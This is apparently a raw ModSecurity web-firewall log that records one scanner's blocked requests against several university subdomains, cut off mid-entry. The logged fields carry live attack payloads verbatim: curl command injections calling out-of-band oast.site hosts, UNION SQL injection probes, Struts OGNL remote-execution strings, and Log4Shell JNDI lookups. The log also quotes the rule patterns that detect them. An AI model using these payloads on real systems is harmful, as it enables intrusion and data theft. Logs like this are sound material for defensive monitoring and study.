[Tue Aug 29 11:33:51.359029 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlg9mgrf79w4bkcs.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11L8Co-f0AAARdiM8AAAAK"]
[Tue Aug 29 11:33:52.373651 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAAR@KJIAAAAF"]
[Tue Aug 29 11:33:52.401048 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlg1b8r9h4jmc1nu.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11MMCo-f0AAARdiNIAAAAK"]
[Tue Aug 29 11:33:52.426547 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAARdiNMAAAAK"]
[Tue Aug 29 11:33:52.427874 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "journal.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARtACwAAAAV"]
[Tue Aug 29 11:33:52.452853 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAARtAC0AAAAV"]
[Tue Aug 29 11:33:52.471476 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "pusatbahasa.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAASEJRIAAAAE"]
[Tue Aug 29 11:33:52.472604 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAAR@KJYAAAAF"]
[Tue Aug 29 11:33:52.493741 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARQ4DoAAAAB"]
[Tue Aug 29 11:33:52.550382 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "ft.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARtADEAAAAV"]
[Tue Aug 29 11:33:52.551288 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11MMCo-f0AAASEJRYAAAAE"]
[Tue Aug 29 11:33:52.552288 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgxrpxhsi75sdpy.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11MMCo-f0AAAR@KJoAAAAF"]
[Tue Aug 29 11:33:52.571740 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "informatika.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11MMCo-f0AAARtADIAAAAV"]
[Tue Aug 29 11:33:53.301056 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgef7f1bqjhh9xw.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAASFeegAAAAG"]
[Tue Aug 29 11:33:53.303728 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgaref78cqfgjmb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAARy-1EAAAAb"]
[Tue Aug 29 11:33:53.308370 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgkujkf3z53hstm.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAASAHeYAAAAH"]
[Tue Aug 29 11:33:53.319805 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgxbbjtg9fg7i3t.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAANsAmoAAAAD"]
[Tue Aug 29 11:33:53.320262 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg641prf5tyho9p.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAARjjTMAAAAL"]
[Tue Aug 29 11:33:53.339630 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlggaatjw5ou7tgz.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAARtADgAAAAV"]
[Tue Aug 29 11:33:53.340070 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg7ds5qk45myh1i.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAANsAmsAAAAD"]
[Tue Aug 29 11:33:53.340896 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "journal.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAASFeeoAAAAG"]
[Tue Aug 29 11:33:53.342676 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlghduyn8dpqt6eu.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAAR@KJ8AAAAF"]
[Tue Aug 29 11:33:53.352259 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "informatika.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAASEJRoAAAAE"]
[Tue Aug 29 11:33:53.360458 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:customer_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:customer_number: -1' UNION ALL SELECT NULL,NULL,CONCAT(md5(999999999),1,2),NULL,NULL,NULL,NULL,NULL,NULL'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/mims/updatecustomer.php"] [unique_id "ZO11McCo-f0AAARtADkAAAAV"]
[Tue Aug 29 11:33:53.366459 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "pusatbahasa.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAAQKOqUAAAAs"]
[Tue Aug 29 11:33:53.380631 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: 